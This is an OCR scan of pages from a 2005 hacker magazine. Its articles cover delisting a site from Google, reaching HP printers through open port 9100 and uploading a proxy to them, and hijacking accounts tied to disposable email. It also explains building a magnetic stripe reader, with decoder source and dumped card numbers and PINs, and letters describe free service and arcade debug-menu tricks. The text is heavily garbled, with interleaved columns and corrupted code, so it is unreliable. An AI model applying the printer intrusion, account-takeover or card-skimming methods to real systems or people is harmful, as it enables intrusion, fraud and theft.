meta tags t o your index.html. I f you want Google After you add a l l the meta t a g s you want, you
- and every other engine - t o ignore your entire may be finished. But if you're t r y i n g t o keep bots
site during i t s spidering of the web, add this out of your entire site permanently, the next
meta tag t o your header: thing t o do is create a robots.txt f i l e i n your
S p r i n g 2005 page 23'
/I;ebsite1s root directory. Pull up Notepad and Special thanks t o Google's Listing ~ e m o v a i
type i n the following two lines: Resource which i s at: http://www.google.com.gr/
User-agent: * &remove. html
Disallow: / The above page can also help you if you want
Save this file as robots.txt and f t p it t o your t o remove images from Google's image search en-
site's root directory. This will t e l l the Googlebot gine. Especially handy if you don't want people t o
be able t o link your name t o your face or find
and actually a l l other search engines not t o
your wedding photos. You can learn more about
bother looking at your page and t o spider some-
robots.txt files and what they can do here:
where else. Obviously, if you create this file then http://www.robotstxt.org/wc/norobots.html
you don't need the meta tags but if you're extra Of course, it may simply be easier t o password
paranoid then you should use both methods Like I protect your page if you don't want people seeing
did. what's inside. But sometimes that's not feasible
After you've done a l l that, go and sign up for because of the inconvenience it may pose t o your
a Google account a t http://services.google audience. Besides, Google can index password-
~.com/urlconsole/controller protected pages according t o Google's corporate
This page is for people who urgently want information page. Not only that, but anything
their URLs removed from the index. Even then it that is simply sharing space on your server is fair
will take up t o 24 hours. But if you'd rather wait game t o the Googlebot like Excel or Word files.
six t o eight weeks, be my guest. After you create Even SSL pages can be indexed. The above meth-
an account, Google w i l l email you a link where ods willserve t o hide your page by practically dis-
connecting it from the web. Once Iwas out Itried
you enter the URL of your robots.txt file you just
t o Google for my name and page and sure enough
uploaded and then Google sends their bot over t o
it was gone. It was like the page didn't exist and
your site right away t o read it. With any luck, it gave me such a nice warm fuzzy feeling inside.
you're out of the index i n a day or two. Iwas out One disclaimer though: if you were using
i n less than 12 hours. I f you want t o get back in, Google as your in-house search engine solution
just remove a l l the meta tags and the robots.txt t o help your users find information on your page
file. As Long as someone is linking t o you some- it will no longer work once you've been delisted.
where you'll be listed again after Google's next Have fun!
web crawl. Shoutouts to the Boneware Crew.

H P Printers:
by DarKry HP did build i n password protection, but it is dis-
darkry@gmail.com abled by default and i n fact, i n a l l my exploring I
Iwas recently reading a book of fictitious sce- didn't find a single printer that had a password
narios i n which a hacker gains access t o a net- set. Many of these printers also have an f t p
work through a printer. The book cited a t o o l server enabled by default, and again the pass-
called Hijetter available a t phenoelit.de. Hijetter words are a joke. Different models have different
i s a t o o l for windows which uses HP's PJL protocol default passwords and t o list them here would be
t o connect t o and perform simple tasks on cer- pointless (use google). I n case the implications
tain printers. Curiosity got the best of me so I aren't obvious t o everyone yet let's review. These
started doing a little research into what exactly printers have web and f t p servers running out of
these printers are capable of. First let's look at the box. With a beefy 8mb of flash memory stor-
some of the features built into these printers; age a printer suddenly becomes an attractive
many ship with built-in web servers which allow place t o anonymously store a l l sorts of fun
for remote administration. These servers allow a things. But this i s only the tip of the iceberg.
remote administrator t o see the status of the First let's look at how t o find printers. As an
printer, view recent print jobs, and change envi- administrator is setting up a network he is wor-
ronment variables. It i s worth mentioning that ried about a l o t of things. Keeping the bad guys
\
'out i s top priority. After configuring a firewall t o that Iwas finding. Ikept seeing references t o
only allow the right people access t o the right something called Chai Java. This got me inter-
ports the rules can start t o look like a giant game ested again. Could it be t h a t some o f these print-
of Blinko. It i s understandable that blocking the ers actually had a java virtual machine built i n t o
printer spooling port from outside access may them? That would mean t h a t a n y code Iwrote
not have crossed the admin's mind. I n f a d there could be run from a printer, b u t more importantly
are valid reasons t o allow this, for instance, t o a printer inside a target network. After playing
allow employees t o print from home. All ports around a b i t more Ifound that, yes, this really
aside, a printer definitely doesn't appear t o be a was possible. From the web server on these print-
threat. After all, what damage can a printer do? ers you can upload code t o be r u n on t h e printer.
Fire up nmap and run a scan on your corporate Chai Java is still i n i t s infancy b u t already it i s
network for machines with port 9100 open. Once possible t o run a l l sorts o f interesting things.
you have a list, t r y surfing t o each address. Most importantly, an important step has been re-
Chances are most of them will have a web server. moved. The most difficult step i n breaking i n t o a
Those who are interested i n getting their hands network has always been f i n d i n g a way past the
dirty can get a library for PJL communication, firewalls. Suddenly instead of searching for a vul-
also from the folks at Phenoelit. nerable machine, an intruder can simply connect
Now so far this has been a relatively benign t o a printer's web site and upload a proxy. As far
hack. We have accessed a printer and the most as security goes it's as bad as having internal net-
damage we can do i s lock it with an error or print work jacks on the outside wall o f your corporate
"Insert Coin" on the LCD display. Iwas starting t o headquarters.
get bored with a l l this and about t o move on t o Shouts of course go out t o DarkLordZim,
bigger and better things when Inoticed some- Brutallnquisition, Razorwire, a n d the rest o f the
thing strange about some of the newer printers crew on mediamonks.

by StankDawg of the influx o f spam t h a t may result from re-


stankdawg@stankdawg.com questing information from some site.
The spam epidemic has gotten horribly out of You could use this t o sign u p t o a mailing list
control. We a l l know that. Many solutions are be- for example. You can then check i n on that ac-
i n g attempted t o avoid spam from legislation t o count t o read the mailing l i s t without fear of
technical alternatives. Filtering is not an exact them selling your address around t o other lists or
science and it never w i l l be. Blacklisting sites and spammers. You might also use t h i s as a one-time
servers is unrealistic because one server can be disposable message center. Perhaps you want t o
tainted by one user. Another recent phenomenon post t o a site and want replies t o a question but
has been the onset of "disposable" email ac- not get flooded with responses o r have your real
counts. Some sites that offer these services are email address made public. These are perfect ex-
dodgeit.mm and mailinator.com but there are amples on how and why t o use this type of ac-
several others scattered around the web. count. Specifically, the mailing l i s t example i s a
A disposable email account i s one that i s not good way t o add RSS content t o your site without
consistently used or tied t o an individual person. the spam. Many of these sites (dodgeit.com for
Personally, Ihave created accounts on my own example) generate a news feed using RSS t h a t
server for this very purpose and then deleted the you can add t o your site. Mailing list content t h a t
account after Iwas done with it. Not everyone you control!
has the luxury of having their own server t o do Keep i n mind t h a t due t o t h e nature o f these
this. To meet that need, some sites have ap- systems, they provide free access for anyone t o
peared that allow any user t o create a disposable use them a t any time. This means t h a t these dis-
, account t o get a reply or information without fear posable email sites do not have account valida-
6 o n of their own. That could be an ironic mess! t o change their password. Ican t e l l you as a mat:
What they do is allow anyone t o access any ac- ter of fact that this happens quite frequently.
count at any time. That way, there are no pass- Ako, keep i n mind that these services are
words t o deal with and no account set up of any web-based. "So what?" you may say. Well, i n the
kind. Anybody can use the service and nobody i s example above Imentioned that if you noticed
excluded. It's a spam solution for everyone! someone at a site or went digging through a site
This leads me t o the first problem with these for those email addresses you would find them.
systems as they are now. Once again, due t o the No one really wants t o manually search for peo-
nature of these systems, they are meant t o be ple. So we look t o automate things. Since these
disposable and used as described above. Dispos- are web services, guess what crawls out every so
able accounts were not intended t o be used for often and picks them up? That's right, spiders
any type of real mail usage although, theoreti- from search engines! I f you haven't already
cally, they could be. That is why Icall them "dis- dropped this article t o t r y it, stop and do a
posable." I n fact, you will find that there i s no Google search for "@dodgeit.com" and see what
delete function on these services. What need you can find. I f the site is designed properly,
would there be for a delete function on a dispos- they will prevent spiders from finding the actual
able account anyway? The system will delete files mailboxes on the disposable email site (which
every 30 days or whatever the system i s set for. they do) but other sites where people are posting
Another reason t o not have a delete function i s or using the disposable email addresses usually
the fact that Imentioned earlier about anyone do not.
accessing any otheraccount. All it would take is a Ialso want t o emphasize that just because
few ne'er-do-wells t o go i n and delete your con- the initial emails with passwords may have been
firmation messages before you can get t o them. rolled from the system, that doesn't mean any-
Someone could even delete everything i n your thing. There is a fatal backdoor that exists here.
mailbox just t o be a jerk. I f you think that would It is actually the true definition of a backdoor!
be too hard t o maintain and figure out, trust me Even if you miss the original confirmation email,
when It e l l you that it could easily be scripted t o or even if they changed their password right away
do this with no manual intervention. This i s not as suggested, almost every site offers a password
even the biggest problem with these systems. It recovery system for their users. All a person
is the misuse of them that could really get you would have t o do is go t o t h a t password recovery
Owned. request and have a new password sent t o the
The big mistake that people make with this original email address, which i s...you guessed it,
kind of account is that they t r y t o use it for public!Any account that has been registered with
things that quite simply, they should not. Some any of these "disposable email accounts" can be
people may think that registering for a forums backdoored. And if you think this isn't a danger,
site or a CMS (content management system) with imagine the identity t h e f t that could take place!
a disposable account may be a good idea t o avoid Opening eBay accounts under your account,
potential spam or revealing their real email ad- changing other information on a site, the list
dress i n a questionable environment. But under- goes on.
standing how a forum works is crucial. I f the This is not only an open invitation for a per-
forum doesn't validate any emails, then it w i l l be son t o have their account owned and be spoofed
fine. Most forums, however, will make you vali- by someone eke. It could actually be worse than
date the email address by sending a confirmation that. Those of us who run websites may now have
password t o that address that you must enter t o people using the system who have taken over
complete the registration process. There you go someone else's account. They are now i n the
sharing your account information, including system, with no valid email, so that they can
password, with the world. wreak havoc on your system if they wanted t o
Since that disposable email account is open without fear of repercussion. Obviously, you
t o the world, anyone can check your mail. All could check the logs but they simply use a proxy
they need t o know i s the account name. I f they t o avoid detection without much deeper means of
registered with a forum site for example, it can investigation.
easily be looked up i n the members list. Go back What can and should be done about these
and check their "disposable" email account and problems? Well, that i s for you t o decide. As a
see if they left the email there. Remember, there user of these services, Ican simply recommend
i s no delete feature on these systems! I f it is still that you be careful and think out the dangers of
i n the system, you will see the site and the pass- using them. Do not put any personal information
word. People who are using a disposable email on them or have personal information sent t o
, account t o register for a site are usually too lazy them. Do not use them t o register with sites
2600 Magazine 1
\
G e r e your password w i l l be mailed t o you. I f you database that interacted with t h e mail server t o
do, for crying out loud go check the email right automatically create temporary accounts on t h e
away and then go i n and change your password mail server and delete them after a certain
immediately! Doing t h a t will keep you from being amount o f time.
spoofed on a site but it still lets the world now What makes this service different? Firstly, it
that you are registered a t that site, so you have offers password protection! Secondly, it offers
lost some privacy i n general. Keep that i n mind the ability t o delete emails. Both o f these are of-
when you register for your assorted prOn sites. fered through a web mail front-end t h a t no one
What if you are a webmaster o f a site and you else can access without a password. What this
are concerned about this? You also have t o make also does i s lock t h e backdoor. Sending password
your own choices. You may decide t o not allow change requests will not work f o r t w o reasons.
users t o register from these known sites. Many One, they will not have t h e password t o your ac-
sites do not allow yahoo or hotmail or other pub- count (unless you do something stupid), and
lic mail account users t o register. These sites can two, the accounts a l l have expiration dates! The
be treated the same way. You can send your pass- whole point o f a disposable email account i s t h a t
words encrypted somehow but this makes it it be temporary. We designed our database t o
tougher for non-tech sawy users t o complete have a user-defined expiration d a t e (seven days
registration. It would, however, be safer for your maximum) for the account time-to-live. After t h e
site. Certainly you should force your users t o expiration date i s passed, t h e account i s deleted
change their password immediately when they by a cron job and permanently locked i n the
register so they do not leave t h a t default pass-
database t o prevent it from ever being used
word working.
again. This includes the original user. If you
Finally, Ido not see with so many public email
wanted a reusable account, t h e n you shouldn't
services available, why people don't just create a
have used a disposable email service.
new Gmail account or yahoo account or hotmail
We designed the database to be very simple,
account. The list of options is endless. These ac-
counts would be password protected but you yet powerful at the same time. I t only keeps the
could still treat them as disposable accounts. Use minimum amount of data t o automate the ser-
them once, then forget about them. Register vice, and the password i s not o n e o f them. That i s
them against the disposable services Listed above handled by the mail server alone t o avoid another
for two layers of protection! That little extra step point of attack. We are using a web mail client
will pay off. But instead of using Gmail or yahoo, (still undecided a t this point, b u t probably squir-
we decided it would be better t o just create our relmail) t o handle the interface, so t h a t code
own service. base was already done; we simply implemented
When Ifirst wrote this article, Ioriginally it. Nick84 wrote the base code a n d we a l l worked
suggested that the reader could set up a new together modifying it from there. The site i s
mail service that could eliminate the problems tested and up and running, so please feel free t o
mentioned earlier. It so happens t h a t Ihad a do- use it. It i s a free service from t h e DDP t o help
main registered just as a test bed for different protect your privacy and avoid spam. We use it.
projects that we work on. Ithought it would be a We like it. We hope you do too.
good idea t o turn this site i n t o a disposable email Further research: dodgeit.com, mailinator
service that actually protected your privacy and ,.corn, Google "related:", wil1hackforfood.biz.
anonymity while providing spam protection. The Shoutz: The DDP, particularly nick84 for writ-
fact t h a t it creates a funny email address i s a i n g the base code, ld@blo, Decoder, lucky225,
1 bonus. It was a simole matter of desianina a sauirrelmail. ora.

Four new pages have been added as of this issue!


They are Pages,61, 62;\63, and 64.
Please do your'best tcv make them feel a t
1 >

\Spring ZOO5 Page 27


by Red bird a constarit velocity. This is where your custom
redbird@2600.com hardware ingenuity comes in. Mount a ruler (or
Good magnetic stripe readers are hard t o other straight edge) perpendicular t o the mag-
come by. Most are expensive, only capable of netic head, with the reading solenoid (usually
reading one or two tracks, and have inconvenient visible as a black rectangle on the head) at the
interfaces. I n this article I w i l l describe the correct distance from the base for the corre-
process of making an extremely cheap, simple, sponding track. Track 1starts a t 0.223" from the
and reliable single-track reader from parts that bottom of the card, Track 2 starts at 0.333", and
are readily available. We w i l l be interfacing the Track 3 starts a t 0.443".
reader t o the microphone input of a sound card, Alternatively, you can purchase a surplus
which is very convenient for use with most lap- reader with no interface (i.e., scrapped or with a
tops and desktops. cheap l l L interface) and follow the same instruc-
Iwill not be discussing the theory and con- tions with the exception t h a t the magnetic head
cepts of magnetic stripe technology and the as- will already be mounted. Most surplus readers
sumption is made that you are somewhat familiar come preset t o Track 2, although it is usually a
with the topic. For a simplistic overview of mag- simple hardware mod t o move it t o the track
netic stripe technology that is easy t o read and you'd like t o read. This will save you the trouble
understand, Irecommend that you read the clas- of building a custom swiping mechanism and will
sic article "Card-0-Rama: Magnetic Stripe Tech- also improve the reliability o f the reads. There are
nology and Beyond" by Count Zero, which can be surplus readers t h a t can be purchased for less
found quickly by doing a web search for keywords than $10 US at various online merchants.
i n the title. Software
Materials I n this project, the software does a l l the
Below is a list of materials you'll need t o con- h e a y lifting. The "dab" utilityincluded i n this ar-
struct the reader. ticle takes the raw DSP data from your sound
Magnetic head. Magnetic heads are extremely card, decodes the FSK (frequency shift keying -
common. Discarded cassette tape players contain a.k.a. Atkin Biphase) modulation from the mag-
magnetic heads of almost the exact size needed netic stripe, and outputs the binary data. Addi-
(the small difference won't matter for our appli- tionally, you can decode the binary data using
cation). Simply obtain a discarded cassette tape the "dmsb" utility (available i n the "code" section
player and remove the magnetic head without of the 2600 website) t o output the ASCII charac-
damaging it. These heads are usually secured ters and perform an LRC check t o verify the in-
with one or two screws which can be useful when tegrity of the data, provided that the stripe
building the reader, so don't discard them. conforms t o the specifications described i n IS0
3.5mm mono phone plug (with 2-conductor 7811, 7813, and optionally IS0 4909 (for the un-
wire). You can find this on a discarded monaural common Track 3). Becoming familiar with these
earphone or i n an electronics store. specifications will help you understand the con-
Soldering iron with solder. tents of the magnetic stripe when viewing the
Optional: decoded data.
Wood (or other sturdy material) base t o mount The provided software is more proof-of-con-
magnetic head. cept than production code, and should be treated
Ruler or other straight edge t o slide cards on. as such. That said, it does i t s job well. It is open
Construction source and released under the MIT license. Feel
The actual hardware design i s incredibly sim- free t o contribute.
ple. The interface consists of simply connecting Requirements
the output of the magnetic head directly t o the Linux (or the desire t o port t o another operating
mic input of a sound card. Solder the wire con- bsystem)
necting the 3.5mm mono phone plug (base and A configured 16-bit sound card
tip) t o the leads of the magnetic stripe head. Po- Access t o the/dev/dsp device
larity does not matter. libsndfile
I recommend that you mount the head i n a Note that "dab" can also take input from any
way that makes it easy t o swipe a card over it with audio file supported by libsndfile. However, it
G s t be a clean sample that starts at t h e begin-
ning of the file. This is useful t o eliminate the re-
quirement o f a sound card and allow samples t o
be recorded from another device (e.g., an MP3
player/recorder) and decoded a t another time.
Compiling
Edit any configuration #defines near t h e top
of the dab.c file and proceed t o compile t h e
source with the following command^
cc dab.c -0 dab -1snd6le
Usage f o r dab.c
-a, --auto-thres Set auto-thres percent
rage (default: 30).
-d, --device Device to read audio data
,from (default: /dev/dsp).
-f, --file File to read audio data from
,(use instead of -d).
-h, --help Print help information.
-m, --max-level Shows the maximum level
@(use to determine threshold).
-s, --silent No verbose messages.
-t, --threshold Set silence threshold
,(default: automatic detect).
-v, --version Print version information.
I

I I
My current leader, made o f a modified surplus
reader which is only capable o f reading the three
standard tracks.
Examples
Below are some examples o f a few (hopefully)
less common cards so as t o get a n idea o f the sort
of data you're likely t o find.
Park Inn (Berlin-Alexanderplat z ) Door
Key Cards
Room: 2006
Checkout Date: 12/30/2004
Card 1
Track 2 Data:
5101152006010912130124000120000000000
Card 2
Track 2 Data:
5101152006020912130124000120000000000
Room: 2005
Checkout Date: 12/30/2004
Card 1
Track 2 Data:
5101152005010160230124000120000000000
Card 2
My original reader. With this reader Iwould Track 2 Data:
use a ruler as a track guide. This way I could not 5101152005020160230124000120000000000
only read the three standard tracks, but also data SEPTA Monthly Transpass Cards
on non-standard cards, some o f which have Month: NovemBer 2004
tracks i n odd positions such as through the Serial: 001467
middle of the card. Track 2 Data:

\ S p r i n g ZODii Page i'q 1


610100110104113004000001467 \
one o f the many MP3 (and other codec)
M o n t h : J u n e 2003 player/recorders on the market. You could then
S e r i a l : 002421 set the device t o record, interfaced the same way
T r a c k 2 Data: with the magnetic stripe reader, and have a
010100060103063003000002421 stand-alone reader small enough t o fit i n your
M o n t h : J a n u a r y 2002 pocket. Later, you'd view and edit the captured
S e r i a l : 028813 audio file, saving the clean waveform t o a stan-
T r a c k 2 Data: dard .wav file t o be analyzed with "dab" (which,
010100010102013102000028813 i n fact, has this capability). You can even
Sony Connect Cash Cards construct the reader i n an inconspicuous way,
C a r d Number: 603571 010462 1134569 so onlookers would never realize the device's
P I N : 9014
capability.
T r a c k 1 Data:
How is this significant? Reading boarding
B6035710104621134569A~49120000040
passes with magnetic stripes is a perfect applica-
Track 2 Data:
tion. These are generally only available i n the
6035710104621134569=49120000040
waiting area of airports. They're issued at check-
C a r d Number: 603571 010462 1132282
i n and collected when you board, leaving a very
P I N : 5969
small time margin during which the stripe can be
T r a c k 1 Data:
scanned. I n my case, I had been flagged for addi-
B6035710104621132282~~49120008147
tional security and the infamous "SSSS" was
T r a c k 2 Data:
printed on my pass. Using my reader, I was able
6035710104621132282=49120008147
t o duck into a bathroom and quickly read the
S t a r b u c k s Cards
data i n t o my mp3 player/recorder for Later analy-
C a r d Number: 6015 0613 2715 8426
sis. (I discovered a mysterious code on track 2
T r a c k 1 Data:
(normally blank) which read: "C 13190-2******"
B6010565061327158A0040/MOMSDAY04~2501
as well as an "5" a t the end o f the passenger data
~0004000060018426
on track 1.)
T r a c k 2 Data:
6010565061327158=25010004000060018426
But there are other more sinister applica-
C a r d Number: 6014 5421 5637 9529
tions. What if one o f the waiters at your favorite
T r a c k 1 D a t a : B6010564542156377^0027/
restaurant built this device and swiped the card
~EXCLUSIVEB2B04A25010004000060019529
of everyone who pays with credit? From the data
T r a c k 2 Data:
obtained, an exact clone of the credit card could
6010564542156377=25010004000060019529 be created. Credit card fraud would quickly be-
C a r d N u m b e r : 6014 5421 6302 5757
come out of control if this were commonplace.
T r a c k 1 D a t a : B6010564542156377^0027/ The same principle could be applied t o re-
bEXCLUSIVEBZBO4~25010004000060019529 verse-engineering an unknown magnetic stripe
T r a c k 2 Data: technology. While individual card samples are of-
601 05645421 63027=25010004000060015757 ten much more difficult t o obtain, scanning sam-
Conclusion ples as you obtain them enables you t o gather
This project was originally started for the New samples at an astonishing rate. This way, sup-
York City MetroCard decoding project that you porters can loan you cards t o scan on the spot. I
may have heard about on O f f The Hook. Nearly a l l have personally used this method for the Metro-
commercial readers are unable t o dump the raw Card decoding project and it works extremely
data as it exists on the MetroCard and, even if well.
they could, they are priced way above our (and Icould go on and on with more examples of
most hobbyists') budget limitations. This solu- the implications of this sort of design, but I ' d like
tion has worked very well for us and can aid you t o hear back from the readers as t o what other
i n reverse-engineering cards that you may have ideas may have been thought up. All feedback i s
as well. The "dmsb" application available online appreciated and, time permitting, a l l questions
can be used for simply decoding standard cards will be answered.
that you have laying around as well. Hopefully this project makes you realize how
While my construction example demonstrates certain types of technology are priced way above
a fairly straightforward and typical use of a what they have t o be t o keep them away from
magnetic stripe reader, many other uses can be "us" because of the fear of malicious use. I also
considered. hope it encourages more projects like this t o sur-
For instance, since a l l the data obtained from face so we can learn about and use technology
the reader itself is audio, the device can be inter- without the restrictions imposed upon us by big
faced t o a digital audio recording device, such as corporations.
i
I;* dab." -Decode Aiken Biphaae
Copyright ( c ) 2004-2005 Joseph Battaglia <redbird@2600.com>
Released under the NIT License.
Compiling:
cc dab.= -0 dab -lendfile
*I

I*.* defaults +.*I


#define DEVICE "Idevldsp' I* default sound card device +I
#define SAMPLE-RATE 192000 I
' default sample rate (hz) *I
#define SILENCE-TERES 5000 I. in~tialsilence threshold . I
I*** end defaults *"I

I
' #define DISABLE-VC '
I I* disable velocity correction if defined *I
#define AUTO-Tunes 30 I* pct of highest value to set silence-thres to *I
#define BUF-SIZE 1024 I* buffer size * I
#define END-LENGTE 200 I* msec of silence to determine end of sample *I
#define FREQ-THE5 60 I
' frequency threshold (pct) ' I
#define MRX-TERM 60 I* sec before termination of print-max-level0 *I
Xdefine VERSION "0.6" I* version * I

short int *sample = NULL;


int sample-size = 0;

I* allocate memory with out of memory checking


[size] allocate size bytes
returns pointer to allocated memory *I
void *xmalloc(aire-t s ~ z e )
I
void 'ptr;

ptr = malloc(aize);
if (ptr == NULL) {
fprintf(stderr, ''Out of memory.\n");
exit(EXIT_FAILURE);
)

return ptr;
1
I* reallocate memory with out of memory checking
[ptrl memory to reallocate
[size] allocate size bytes
returns pointer to reallocated memory *I
v a ~ d.xrealloc(vaid 'ptr, size-t sire)
I
void *nptr;

nptr = realloc(ptr, size);


if [nptr == NULL) (
fprintf(8tderr. Out of memory.\n");
erit(EXIT_FAILURe);
1
return nptr;
)

/ + copy a string with out of memory checking


[string] string to copy
returns newly allocated copy of string *I
char *xstrdup(char *string)

char +ptr;

ptr = malloc(strlen(~tring1 + 11;


strcpy(ptr. string);

return ptr;
>
I* read with error checking
[fdl file descriptor to read from
[bufl buffer
[count1 byte8 to read
returns bytes read *I
ssize-t xreadqint fd, void .buf, size-t count)
I
int retval;

retval = readlfd, buf. count);


if (retval == -1) {
perror("read( I " ) ;
exit(EX1T-FAILURE);
1
return retval;
)

I* prints version
[stream] output stream *I
void print-version(F1LE retream)
1
-
fprintflstream, "dab Decade Aiken Biphase\n");
fprintf(stream, "Version % ~ \ n "VERSION);
,
Continued o n page 41
<Spring 2005 Page 3J1
Research Results phone calls on thc oid phone.
But then one night by accident while playing Tetris
Dear 2600: on my old phone, Iconnected t o t h e Get It Now network.
This is t o comment on Lori and t3st-s3t's submitted Iwas able to download any game, program, ringtone, or
observations i n 21:3 about t h e "weird" number that gives picture free ofcharge!I have n o t added money t o the old
off a list o f digits and tones and then reroutes t o a busy phone i n two months and Ican still connect t o Get It
signal. The numbers were 1-800-506-3553 and 1-800- Now and download anything, and Iam never billed for it.
789-6324. Imyself had an encounter with one of these This must be some glitch on Verizon's prepaid phones.
numbers. Iwas scanning for extenders and came across Also, Ibought a US5 cable that connects my old
1-800-877-6533. Iwas able t o have it produce 900 16 7 phone t o my computer. Even though Ican't make or re-
115030974. Icalled the number on February 21, 2004 a t ceive any normal "voice" calls, Ican still use my old cell
1:00 P.M. Icalled it again numerous times within the phone as a modem for my computer. Ican use Windows
course of the hour and it punched off 900 3 7 11 HyperTerminal t o call other modems or fax machines, or
5030974 and then 1, and then 4. So pretty much its out- Ican call some o f those free Internet providers like Net
line is 900 X(X) 7 11 5030974. I n 21:3 t3st-s3t marked Zero t o connect t o the net from my Laptop when I'm not
the outline as 200 (XX) 7113267347. Upon further notice a t home or when my cable modem goes out. I'm not sure
you can see that the only similarities i n these outlines i s why Verizon is still allowing me t o make data calls from
(XX) 7 11. Potentially the 900 and 200 could be state or my old phone without billing me for them. And Idon't
area assignments and the 5030974 and 3267347 could understand why Ican make data calls b u t not voice calls.
be trunk pairs? Once I documented these numbers I Have you heard o f anything like this?
signed onto the irc.2600.net sewer and chatted with a And ifVerizon finally realizes how much stuff Igot
few friends. We believe that it could potentially notify from Get It Now and a l l of the data calls Imade, do you
t h e caller of their trunk pair's number. think they would be allowed t o b i l l me for them? Would I
Also, i f anyone knows anything about AT&T1s Easy be responsible for paying for t h e subscription charges
Reach 800 service I'd like t o know. Icalled up an 800 and t h e data calls Imade? Imeans it's their fault, not
number and was prompted for a password. Iwas thinking mine. Idid not sign or agree t o any contracts or any-
it was an extender because it only requested a two digit thing. It was a prepaid service.
login. Ieventually located it, but Iwill not disclose it for Dyslexic-Hippie
the client's sake. Ilearned it's a toll-free service t o reach I f y o u didn't sign anything, then it's likely that Veri-
someone remotely, but I'm assuming that there are other zon doesn't even know who you are. And even if they did,
capabilities. they would have to somehow prove that you still had
The Neuralogist your phone and were still using a service that you techni-
I n our latest experiments on the "weird" numbers we cally no longer had. And after that, it would still be their
were genitg a suffix o f 4086584 with prefixes o f 897, responsibility to terminate prepaid service, n o t yours.
898, 903, and 914 on the 3553 number. For the 6324 But we really doubt this little bug will last much longer
number we g o t a suffix o f 3267347 with prefixes ranging anyway.
from 215 to 228. As always, 711 was sandwiched be- Dear 2600:
tween the prefix and suffix. A l l o f this was identical to Recently, whilst shopping i n an Albertsons store here
what we g o t i n the fall. i n Texas, I came across one t h a t had a Blue Screen of
What AT&T Easy Reach offers is basically a toll-free Death. Iwent by t o check on it over the next week. From
number that consumers forward to their homes, offices, what Icould tell, it runs on Windows 2000 using a piece
o r cell phones. One o f the features which supposedly of software by NCR. Options i n the menu included look-
makes it harder for outsiders to call them is the imple- i n g at the amount of cash i n t h e machine and testing it
mentation o f a PIN which, as you mentioned, is a grand out. It Let me quit the program as well via the touch
total o f two digits. We wouldn't call it the ultimate way to screen. Ididn't get much more of a chance t o work with it
keep people out. as Ididn't have much time. But Iwould appreciate any-
one who could give more information.
Dear 2600:
The Grand Master of Confusion
For t h e last ten months Iwas using a prepaid cell
phone through Verizon Wireless. (Verizon's prepaid ser- Dear 2600:
vice sucks!) Anyway, Ifinally got a new cell phone and I'm really nothing o f a hacker. But Ido occasionally
plan. But Istill had a l o t o f games and ring tones on the enjoy tinkering around with computers and electronics t o
old phone that Icouldn't add t o my new phone. (Both see what happens. Igot a great opportunity t o do this a
are Verizon phones.) few months back. Iwas a t a bar with some close friends,
Iused Verizon's Get It Now t o get the games, apps, which is why Imay not be too accurate with some of the
and tones. This s e ~ c is e kind of cool but is a waste of details. We were sitting by one o f those newer Golden Tee
money most of the time. When my prepaid account ran games (perhaps the 2004/2005 version, I'm not sure). I
( o u t o f funds, Icould no longer make or receive any had noticed that midnight had come and gone and be-
6 r e long saw that the game was no longer on the Attract sultants out there with a proven track record winning \
mode that it had been on all night. Instead, it was on a jackpots for schools so that they (the schools) can afford
debug type menu. textbooks and course materials. I've interviewed a couple
For the life of me Ican't figure out why it went into of consultants and have reviewed t h e i r game tickets and
this mode. It wasn't any special day, not the first or mid- modus operandi. It's not surprising t h a t these consul-
dle or Last of the month. It didn't seem like it was around tants are often engineers who enjoy t h e study of num-
any specific time, maybe 12:30 centraltime. bers and their behaviors.
You could move around using some of the various Playing the lottery can be a good thing if done i n
buttons, or even up and down with the rollerball. Ifig- moderation and if the player has a n understanding of
ured out which button was the Enter key and Iwas on my the dynamics/challenge involved. And if one paper plays,
way. Ihad t o be careful not t o get out of the debug be- like people do i n commodities t o learn t h e a r t of trading,
fore Iwas done seeing all that was going on i n there. it doesn't have t o cost anything. You can always wager
From the looks of it, I could have changed the message real money when the jackpots are b u i l t up, on average,
displayed on the overhead scrolling LED, but Idoubt any- every two t o three months. Additionally, different lottery
one would've noticed. ( I hate when good comedy goes games offer better odds. Ultimately, choosing a game
unnoticed!) There was a surprisingly Large amount of with some forethought makes prudent sense.
menus, but for a game that has t o connect t o the Inter- We also need t o keep i n mind t h a t our involvement i n
net somehow Iguess this made sense. Iended the ses- games teaches us obscure skills f o r complex problem
sion after Iturned the volume up a b i t (it wasn't that solving!
Loud i n the bar but it was basically muted) and found a Ienjoy your magazine. It's helped me with creative-
way t o turn on free play. Iwas amazed that it worked but divergent thinking.
sure enough, once Iexited a l l 1 had t o do was keep push- Ruth (QuanturnResearcher)
ing the add player button t o get the credits high enough Lottery consultants winning jackpots so schools can
so that my three friends and Icould enjoy a full 18 holes. buy textbooks? What a bizarre concept.
Which we didn't - the place closed down before we could.
Dear 2600:
At a different bar, Ilooked around t o see if there was For several issues now people have created rather
perhaps some button or reset switch or any button com- convoluted ways of getting their I n t e r n e t I P address
bination that would take you into the debug menu, but when it changes due t o having a dynamic address. Up-
t o no avail. Iwould have loved t o have spent some more dating a website or having the address emailed t o them
time looking about i n there, but a t the first bar the game is reinventing the wheelwhen dynamic DNS services exist
was pretty much i n plain sight and Ididn't want a sus- Like that on dyndns.org. This site gives you a domain
pecting waitress t o kick me out for "breaking" their name for free from many they have available like
game. mine.nu. So your address would be s0mename.mine.n~.
CatWithTheGatt On your box you run a daemon which updates your Inter-
Based on what you told us, it seems as if the bar net IP a t dyndns whenever it changes. There are free pro-
closed a t around 1 am. I f somehow they had set this grams t o do this or ones that cost money. Now when you
thing to go into debug mode a half hour after the bar need t o access your computer/server from t h e Internet,
closed, it would make a degree o f sense. Then, if they just use your domain name (s0mename.mine.n~) and it
didn't reset the system clock once Daylight Savings Time will always point t o your dynamic IP. http://www.dyndns
ended, debug mode would be entered an hour earlier -.org/services/dyndns/
while the bar was still open. All o f this is assuming that chuck
this is how the system works and that someone didn't p u t
it into that mode manually. Dear 2600:
Iam actually able t o provide a b i t o f Light a t the end
Further Info of the tunnelfor students Laboring under restrictive poli-
cies and asinine rules about network security. Irecently
Dear 2600: found multiole vulnerabilities i n mv school's private net-
This is i n response t o the article "How To Hack The work, vulneiabilities that were m u i h more cdmplex than
Lottery" i n 21:3. It should be pointed out that although iust adminladmin loain combinations. While Idid duti-
the odds of winning the Lottery could be viewed as stag- ?ully report it t o the-IT department o f my school, they
gering, i n the mathematical sense, as the author points just asked i f Icould come i n and explain i t t o the network
out, the remarkable news is that the odds never ever re- administrator. Ifelt slightly nervous because if this guy
main constant! This is due primarily t o component toler- thought Ihad "hacked" the system, then Icould have
